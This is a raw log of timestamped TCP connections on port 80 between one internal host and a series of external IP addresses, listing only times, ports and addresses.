Jan 13, 2025 10:22:54.775971889 CET	80	49794	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:54.775974989 CET	80	49794	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:54.776354074 CET	49794	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:54.777107954 CET	49794	80	192.168.11.20	160.25.166.123
Jan 13, 2025 10:22:55.136198044 CET	80	49794	160.25.166.123	192.168.11.20
Jan 13, 2025 10:22:59.906707048 CET	49795	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:00.006521940 CET	80	49795	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:00.006741047 CET	49795	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:00.010214090 CET	49795	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:00.110153913 CET	80	49795	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:00.123378038 CET	80	49795	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:00.124124050 CET	80	49795	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:00.124356985 CET	49795	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:01.519824982 CET	49795	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:02.535918951 CET	49796	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:02.635823011 CET	80	49796	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:02.636020899 CET	49796	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:02.639539957 CET	49796	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:02.739612103 CET	80	49796	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:02.753798008 CET	80	49796	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:02.754066944 CET	80	49796	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:02.754208088 CET	49796	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:04.144494057 CET	49796	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:05.160556078 CET	49797	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:05.260654926 CET	80	49797	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:05.260848045 CET	49797	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:05.264442921 CET	49797	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:05.264506102 CET	49797	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:05.364650965 CET	80	49797	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:05.364725113 CET	80	49797	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:05.365065098 CET	80	49797	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:05.365094900 CET	80	49797	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:05.365355015 CET	80	49797	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:05.372648001 CET	80	49797	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:05.372680902 CET	80	49797	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:05.372842073 CET	49797	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:06.768717051 CET	49797	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:07.784827948 CET	49798	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:07.885020971 CET	80	49798	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:07.885234118 CET	49798	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:07.887639046 CET	49798	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:07.987998962 CET	80	49798	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:08.001671076 CET	80	49798	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:08.001741886 CET	80	49798	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:08.002062082 CET	49798	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:08.002684116 CET	49798	80	192.168.11.20	172.67.132.227
Jan 13, 2025 10:23:08.102986097 CET	80	49798	172.67.132.227	192.168.11.20
Jan 13, 2025 10:23:21.856734037 CET	49799	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:22.052100897 CET	80	49799	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:22.052359104 CET	49799	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:22.056221008 CET	49799	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:22.251297951 CET	80	49799	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:22.251988888 CET	80	49799	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:22.252034903 CET	80	49799	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:22.252180099 CET	49799	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:23.561913013 CET	49799	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:24.578108072 CET	49800	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:24.773051023 CET	80	49800	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:24.773272038 CET	49800	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:24.776856899 CET	49800	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:24.971765995 CET	80	49800	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:24.972203970 CET	80	49800	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:24.972429991 CET	80	49800	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:24.972634077 CET	49800	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:26.280097008 CET	49800	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:27.296346903 CET	49801	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:27.491477966 CET	80	49801	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:27.491632938 CET	49801	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:27.495220900 CET	49801	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:27.495271921 CET	49801	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:27.495316982 CET	49801	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:27.690403938 CET	80	49801	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:27.690527916 CET	80	49801	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:27.690716982 CET	80	49801	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:27.690983057 CET	80	49801	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:27.691189051 CET	80	49801	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:27.691498995 CET	80	49801	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:27.691550016 CET	80	49801	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:27.691585064 CET	80	49801	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:27.691749096 CET	49801	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:28.998361111 CET	49801	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:30.014419079 CET	49802	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:30.209342003 CET	80	49802	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:30.209521055 CET	49802	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:30.211882114 CET	49802	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:30.406563044 CET	80	49802	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:30.407274961 CET	80	49802	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:30.407430887 CET	80	49802	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:30.407722950 CET	49802	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:30.408315897 CET	49802	80	192.168.11.20	136.243.64.147
Jan 13, 2025 10:23:30.603013992 CET	80	49802	136.243.64.147	192.168.11.20
Jan 13, 2025 10:23:41.027904034 CET	49803	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:41.346693993 CET	80	49803	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:41.346915960 CET	49803	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:41.350409031 CET	49803	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:41.669295073 CET	80	49803	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:41.712606907 CET	80	49803	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:41.712622881 CET	80	49803	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:41.712888002 CET	49803	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:42.854646921 CET	49803	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:43.870775938 CET	49804	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:44.193416119 CET	80	49804	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:44.193610907 CET	49804	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:44.197124958 CET	49804	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:44.519567966 CET	80	49804	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:44.564910889 CET	80	49804	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:44.564925909 CET	80	49804	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:44.565061092 CET	49804	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:45.697768927 CET	49804	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:46.713970900 CET	49805	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:47.032433033 CET	80	49805	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:47.032638073 CET	49805	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:47.036243916 CET	49805	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:47.036298037 CET	49805	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:47.354805946 CET	80	49805	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:47.354934931 CET	80	49805	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:47.355031967 CET	80	49805	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:47.355225086 CET	80	49805	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:47.355345964 CET	80	49805	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:47.355592966 CET	80	49805	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:47.406032085 CET	80	49805	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:47.406049013 CET	80	49805	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:47.406182051 CET	49805	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:48.540925026 CET	49805	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:49.557104111 CET	49806	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:49.872457981 CET	80	49806	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:49.872754097 CET	49806	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:49.875637054 CET	49806	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:50.190779924 CET	80	49806	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:50.594367981 CET	80	49806	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:50.594504118 CET	80	49806	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:50.594775915 CET	49806	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:50.595360994 CET	49806	80	192.168.11.20	202.95.11.110
Jan 13, 2025 10:23:50.910671949 CET	80	49806	202.95.11.110	192.168.11.20
Jan 13, 2025 10:23:55.874001980 CET	49807	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:23:55.975995064 CET	80	49807	13.248.169.48	192.168.11.20
Jan 13, 2025 10:23:55.976151943 CET	49807	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:23:55.982672930 CET	49807	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:23:56.084060907 CET	80	49807	13.248.169.48	192.168.11.20
Jan 13, 2025 10:23:56.084076881 CET	80	49807	13.248.169.48	192.168.11.20
Jan 13, 2025 10:23:56.084218979 CET	49807	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:23:57.492113113 CET	49807	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:23:58.508254051 CET	49808	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:23:58.610704899 CET	80	49808	13.248.169.48	192.168.11.20
Jan 13, 2025 10:23:58.610824108 CET	49808	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:23:58.614315987 CET	49808	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:23:58.715753078 CET	80	49808	13.248.169.48	192.168.11.20
Jan 13, 2025 10:23:58.715800047 CET	80	49808	13.248.169.48	192.168.11.20
Jan 13, 2025 10:23:58.715931892 CET	49808	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:24:00.116511106 CET	49808	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:24:01.132668972 CET	49809	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:24:02.146734953 CET	49809	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:24:02.248092890 CET	80	49809	13.248.169.48	192.168.11.20
Jan 13, 2025 10:24:02.248354912 CET	49809	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:24:02.252000093 CET	49809	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:24:02.252027988 CET	49809	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:24:02.353498936 CET	80	49809	13.248.169.48	192.168.11.20
Jan 13, 2025 10:24:02.353713036 CET	49809	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:24:02.354211092 CET	80	49809	13.248.169.48	192.168.11.20
Jan 13, 2025 10:24:02.354377985 CET	49809	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:24:02.455146074 CET	80	49809	13.248.169.48	192.168.11.20
Jan 13, 2025 10:24:02.455394030 CET	80	49809	13.248.169.48	192.168.11.20
Jan 13, 2025 10:24:02.455555916 CET	49809	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:24:03.756414890 CET	49809	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:24:04.772491932 CET	49810	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:24:04.876746893 CET	80	49810	13.248.169.48	192.168.11.20
Jan 13, 2025 10:24:04.876993895 CET	49810	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:24:04.879390955 CET	49810	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:24:05.023231030 CET	80	49810	13.248.169.48	192.168.11.20
Jan 13, 2025 10:24:05.990734100 CET	80	49810	13.248.169.48	192.168.11.20
Jan 13, 2025 10:24:05.990750074 CET	80	49810	13.248.169.48	192.168.11.20
Jan 13, 2025 10:24:05.991065025 CET	49810	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:24:05.991714001 CET	49810	80	192.168.11.20	13.248.169.48
Jan 13, 2025 10:24:06.093583107 CET	80	49810	13.248.169.48	192.168.11.20
Jan 13, 2025 10:24:11.280159950 CET	49811	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:11.442555904 CET	80	49811	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:11.442728043 CET	49811	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:11.446249962 CET	49811	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:11.608067989 CET	80	49811	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:11.690412045 CET	80	49811	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:11.690428019 CET	80	49811	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:11.690681934 CET	49811	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:12.957532883 CET	49811	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:13.973679066 CET	49812	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:14.135759115 CET	80	49812	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:14.135900974 CET	49812	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:14.139627934 CET	49812	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:14.301805973 CET	80	49812	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:14.386363983 CET	80	49812	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:14.386380911 CET	80	49812	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:14.386533976 CET	49812	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:15.644381046 CET	49812	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:16.660659075 CET	49813	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:16.822421074 CET	80	49813	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:16.822613001 CET	49813	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:16.826179028 CET	49813	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:16.826250076 CET	49813	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:16.987853050 CET	80	49813	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:16.988033056 CET	80	49813	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:16.988125086 CET	80	49813	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:16.988344908 CET	80	49813	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:16.988573074 CET	80	49813	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:16.988823891 CET	80	49813	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:17.069889069 CET	80	49813	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:17.069905043 CET	80	49813	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:17.070141077 CET	49813	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:18.331455946 CET	49813	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:19.347513914 CET	49814	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:19.509671926 CET	80	49814	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:19.509875059 CET	49814	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:19.512242079 CET	49814	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:19.674796104 CET	80	49814	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:19.758368015 CET	80	49814	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:19.758414030 CET	80	49814	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:19.758752108 CET	49814	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:19.759390116 CET	49814	80	192.168.11.20	103.106.67.112
Jan 13, 2025 10:24:19.921715975 CET	80	49814	103.106.67.112	192.168.11.20
Jan 13, 2025 10:24:24.890567064 CET	49815	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:24.990714073 CET	80	49815	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:24.990902901 CET	49815	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:24.994370937 CET	49815	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:25.094382048 CET	80	49815	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:25.243267059 CET	80	49815	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:25.243288040 CET	80	49815	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:25.243442059 CET	49815	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:25.243810892 CET	80	49815	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:25.243978024 CET	49815	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:26.501485109 CET	49815	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:27.517752886 CET	49816	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:27.617698908 CET	80	49816	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:27.617953062 CET	49816	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:27.621593952 CET	49816	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:27.721525908 CET	80	49816	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:27.870425940 CET	80	49816	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:27.870462894 CET	80	49816	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:27.870487928 CET	80	49816	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:27.870515108 CET	80	49816	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:27.870636940 CET	49816	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:27.870739937 CET	49816	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:29.126758099 CET	49816	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:30.142009020 CET	49817	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:30.241740942 CET	80	49817	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:30.241874933 CET	49817	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:30.245429993 CET	49817	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:30.245477915 CET	49817	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:30.245529890 CET	49817	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:30.345247984 CET	80	49817	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:30.345438957 CET	80	49817	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:30.345525026 CET	80	49817	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:30.345740080 CET	80	49817	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:30.345753908 CET	80	49817	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:30.346031904 CET	80	49817	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:30.346045971 CET	80	49817	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:30.543497086 CET	80	49817	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:30.543545961 CET	80	49817	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:30.543577909 CET	80	49817	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:30.543791056 CET	49817	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:31.750300884 CET	49817	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:32.766477108 CET	49818	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:32.866658926 CET	80	49818	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:32.866894007 CET	49818	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:32.869308949 CET	49818	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:32.969547987 CET	80	49818	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:33.101625919 CET	80	49818	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:33.101658106 CET	80	49818	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:33.101682901 CET	80	49818	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:33.101855993 CET	80	49818	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:33.102008104 CET	49818	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:33.102008104 CET	49818	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:33.102629900 CET	49818	80	192.168.11.20	104.21.112.1
Jan 13, 2025 10:24:33.202537060 CET	80	49818	104.21.112.1	192.168.11.20
Jan 13, 2025 10:24:38.213963985 CET	49819	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:38.542649984 CET	80	49819	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:38.542911053 CET	49819	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:38.546413898 CET	49819	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:38.875119925 CET	80	49819	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:39.568928003 CET	80	49819	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:39.568939924 CET	80	49819	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:39.569082022 CET	49819	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:40.061001062 CET	49819	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:41.077420950 CET	49820	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:41.388808012 CET	80	49820	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:41.388989925 CET	49820	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:41.392493010 CET	49820	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:41.704005003 CET	80	49820	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:42.413182020 CET	80	49820	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:42.413193941 CET	80	49820	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:42.413394928 CET	49820	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:42.904211044 CET	49820	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:43.920311928 CET	49821	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:44.230326891 CET	80	49821	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:44.230546951 CET	49821	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:44.234111071 CET	49821	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:44.234185934 CET	49821	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:44.544070959 CET	80	49821	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:44.544305086 CET	80	49821	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:44.544315100 CET	80	49821	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:44.544595003 CET	80	49821	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:44.544605017 CET	80	49821	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:44.544691086 CET	80	49821	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:44.544939995 CET	80	49821	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:45.232635975 CET	80	49821	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:45.232649088 CET	80	49821	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:45.232871056 CET	49821	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:45.747323036 CET	49821	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:46.763482094 CET	49822	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:47.091012955 CET	80	49822	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:47.091202974 CET	49822	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:47.093590975 CET	49822	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:47.421155930 CET	80	49822	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:48.097130060 CET	80	49822	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:48.097141027 CET	80	49822	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:48.097465992 CET	49822	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:48.098134041 CET	49822	80	192.168.11.20	47.83.1.90
Jan 13, 2025 10:24:48.425364017 CET	80	49822	47.83.1.90	192.168.11.20
Jan 13, 2025 10:24:56.165687084 CET	49823	80	192.168.11.20	194.9.94.86
Jan 13, 2025 10:24:56.378572941 CET	80	49823	194.9.94.86	192.168.11.20
Jan 13, 2025 10:24:56.378803015 CET	49823	80	192.168.11.20	194.9.94.86
Jan 13, 2025 10:24:56.381201029 CET	49823	80	192.168.11.20	194.9.94.86
Jan 13, 2025 10:24:56.591753960 CET	80	49823	194.9.94.86	192.168.11.20
Jan 13, 2025 10:24:56.595937967 CET	80	49823	194.9.94.86	192.168.11.20
Jan 13, 2025 10:24:56.596174955 CET	80	49823	194.9.94.86	192.168.11.20
Jan 13, 2025 10:24:56.596288919 CET	80	49823	194.9.94.86	192.168.11.20
Jan 13, 2025 10:24:56.596407890 CET	80	49823	194.9.94.86	192.168.11.20
Jan 13, 2025 10:24:56.596425056 CET	49823	80	192.168.11.20	194.9.94.86
Jan 13, 2025 10:24:56.596486092 CET	80	49823	194.9.94.86	192.168.11.20
Jan 13, 2025 10:24:56.596497059 CET	80	49823	194.9.94.86	192.168.11.20
Jan 13, 2025 10:24:56.596582890 CET	49823	80	192.168.11.20	194.9.94.86
Jan 13, 2025 10:24:56.596700907 CET	49823	80	192.168.11.20	194.9.94.86
Jan 13, 2025 10:24:56.597467899 CET	49823	80	192.168.11.20	194.9.94.86
Jan 13, 2025 10:24:56.810357094 CET	80	49823	194.9.94.86	192.168.11.20
Jan 13, 2025 10:25:01.604033947 CET	49824	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:01.734817028 CET	80	49824	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:01.734997034 CET	49824	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:01.738528013 CET	49824	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:01.872463942 CET	80	49824	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:01.872474909 CET	80	49824	45.56.79.23	192.168.11.20
Jan 13, 2025 10:25:01.872668982 CET	49824	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:03.243499041 CET	49824	80	192.168.11.20	45.56.79.23
Jan 13, 2025 10:25:04.259654999 CET	49825	80	192.168.11.20	45.56.79.23
